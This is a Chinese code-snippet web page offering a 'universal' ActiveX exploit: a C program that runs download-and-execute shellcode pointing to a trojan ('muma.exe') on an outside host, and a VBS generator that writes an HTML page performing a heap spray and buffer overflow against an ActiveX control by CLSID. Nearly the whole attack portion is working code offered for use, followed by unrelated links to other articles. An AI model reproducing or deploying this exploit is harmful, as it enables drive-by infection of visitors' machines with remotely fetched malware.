ActiveX漏洞通用Exploit vbs修正版_vbs

C++代码

复制代码 代码如下:

#include <stdio.h>     
#include <string.h>     

unsigned char shellcode[] =     
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"    
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"    
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"    
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"    
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"    
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"    
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"    
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"    
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"    
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"    
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"    
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"    
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"    
"http://fenggou.net/muma.exe";     

int main()     
{     
void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用     
* (int *) & code = shellcode;     
code();     

vbs代码

复制代码 代码如下:

exeurl = InputBox( "Please input you want down&exec url:", "输入","http://jb51.net/muma.exe" )    
if exeurl <> "" then    
code="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"&Unicode(exeurl&Chr(00)&Chr(00))    
Function Unicode(str1)    
Dim str,temp    
str = ""   
For i=1 to len(str1)    
temp = Hex(AscW(Mid(str1,i,1)))    
If len(temp) < 5 Then temp = right("0000"&temp, 2)    
str = str & "\x" & temp    
Next    
Unicode = str    
End Function    
function replaceregex(str)    
set regex=new regExp    
regex.pattern="\\x(..)\\x(..)"   
regex.IgnoreCase=true   
regex.global=true   
matches=regex.replace(str,"%u$2$1")    
replaceregex=matches    
end Function    
set fso=createObject("scripting.filesystemobject")    
if fso.FileExists("jb51.htm") then    
fso.deleteFile "jb51.htm",True    
end If    
set fileS=fso.opentextfile("jb51.htm",8,true)    
fileS.writeline "<html>"   
fileS.writeline "<title>Sina</title>"   
fileS.writeline "<object classid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D"" id='target'></object>"   
fileS.writeline "<body>"   
fileS.writeline "<SCRIPT language=""JavaScript"">"   
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"   
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"   
fileS.writeline "var headersize = 20;"   
fileS.writeline "var slackspace = headersize+shellcode.length;"   
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"   
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"   
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"   
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"   
fileS.writeline "memory = new Array();"   
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"   
fileS.writeline "var buffer = '';"   
fileS.writeline "while (buffer.length < 218) buffer+='\x0a\x0a\x0a\x0a';"   
fileS.writeline "target.Method1(buffer);"   
fileS.writeline "</script>"   
fileS.writeline "</body>"   
fileS.writeline "</html>"   
files.Close    
Set fso=nothing    
end if 

时间: 2024-09-19 01:31:29

ActiveX漏洞通用Exploit vbs修正版_vbs的相关文章

VBS加密解密源码(UserAccounts.CommonDialog) 脚本之家修正版_vbs

用法: 1.copy下面代码至文本文档 2.将文件后缀名改为.vbs 3.双击运行 复制代码 代码如下: Ans = InPutBox("请输入要执行的操作:1.加密,2.解密,3.退出.") Ans = Int(Ans) If Ans =1 Then set fso=createobject("scripting.filesystemobject") Set objDialog = CreateObject("UserAccounts.CommonDia

《selenium2 Java 自动化测试实战(修正版)》 更新2015.12.5

java 版来了!! 本文档在<selenium2 Python 自动化测试实战>的基础上,将代码与实例替换为java ,当然,部分章节有变更.这主要更语言本身的特点有关.集合和java下两大主流单元测试框架Junit4 和 TestNG.如何通过sikuli帮助我们识别和定位元素. 自从出了Python 版的Selenium自动化测试以来,一直有同学不断询问有没有Java版的. 其实,关于Selenium的讲解,Java版的资料是最多的.目前市面的Selenium书,大多例子也是用的Java

KesionCMS科讯商业版(ac+sql)+动网论坛结合程序脚本之家修正版_常用工具

KesionCMS科讯商业版+动网论坛结合程序修正版本人购买了套科汛内容管理系统V3.1商业版,然后整合动网论坛,发现了问题,于是问科讯的技术人员要了套所谓商业版的整合dvbbs的程序,发现直接使用出现问题,我看应该是版本的问题.然后结合了他们网上提供的东西,解决了问题,最近做新站,有时间就把那个dvbbs换成sql版的,下载地址为: 下载此文件,如有别的问题可以和我联系qq:461478385

js模拟弹出效果代码修正版_广告代码

模拟弹出效果代码修正版 从网上看到的代码,当文章内容较多时,总会提示 复制代码 代码如下: --------------------------- Windows Internet Explorer --------------------------- Internet Explorer 无法打开 Internet 站点 应该是页面没加载完,所以我判断下,等页面加载完了,再运行 复制代码 代码如下: window.onload=function(){ var oo = new fw.com.u

Jquery.LazyLoad.js修正版下载,实现图片延迟加载插件_jquery

从网上下载来的版本多多少少都有些BUG,尤其是加载后在IE6和IE7下图片闪动是个大问题,在网上查了很久,也没有找到相关的解决方案.没解决方案,就得发挥咱DIY的精神,自己想法解决,分析了BUG,理了理思路,结合前段时间我做弹出窗口特效的方法,解决了Jquery.LazyLoad.js的兼容问题,现将思路和方法与大家分享一下. 解决思路大致是两点,一是从LazyLoad本身的滤镜参数下手,发现有一个参数在IE6和IE7是可以用的,就是show,那么在IE6和IE7下用这个特效:二是IE8以上(包

谷歌提交图书和解协议修正版:缩小适用范围

11月14日下午消息,参与谷歌图书和解的各方今日(美国时间11月13日)向美国法院提交了和解协议修正版.新协议中原告方决定缩小诉讼集体的范围,同时谷歌表示有意与包括中国在内的各地相关 版权人.机构直接合作,以达成类似的协议. 原定于本周一提交的谷歌图书和解协议修正版,终于在今日(美国时间11月13日,周五)由和解各方提交给美国联邦法院南纽约州分院. 谷歌方面透露,在过去的几个月里,和解各方仔细阅读和研究了提交给法院(包括美国司法部)的提议,并与提出问题的相关各方进行了沟通 .正是为解决这些问题,

Google图书协议修正版推出时间延后

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 计世网10日消息 Google与美国出版商的修正协议原订于本周一以前要提出,只是目前看起来需要更多的时间. 美国法官在周一(11/9)批准Google.The Authors Guild及美国出版商协会将图书协议修正版的出炉时间延后到本周五(11/13),该项修正协议原订于本周一以前提出. The Authors Guild及美国出版商协会于

Rcmd.vbs 1.01修正版 增加了下载功能_vbs

这个down.vbs的用法看这里http://www.jb51.net/article/15506.htm 代码: 复制代码 代码如下: On Error Resume Next Set outstreem=Wscript.stdout If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then Wscript.Quit End If If Wscript.arguments.Count<4 Then Wscript.ech

Cookies 欺骗漏洞的防范(vbs+js 实现)

一.攻击原理 Cookies 欺骗主要利用当前网络上一些用户管理系统将用户登录信息储存在 Cookies 中这一不安全的做法进行攻击,其攻击方法相对于 SQL 注入漏洞等漏洞来说相对要"困难"一些,但还是很"傻瓜".我们知道,一般的基于 Cookies 的用户系统至少会在 Cookies 中储存两个变量:username 和 userlevel,其中 username 为用户名,而 userlevel 为用户的等级.当我们的浏览器访问 ASP 页面时,它会传出类似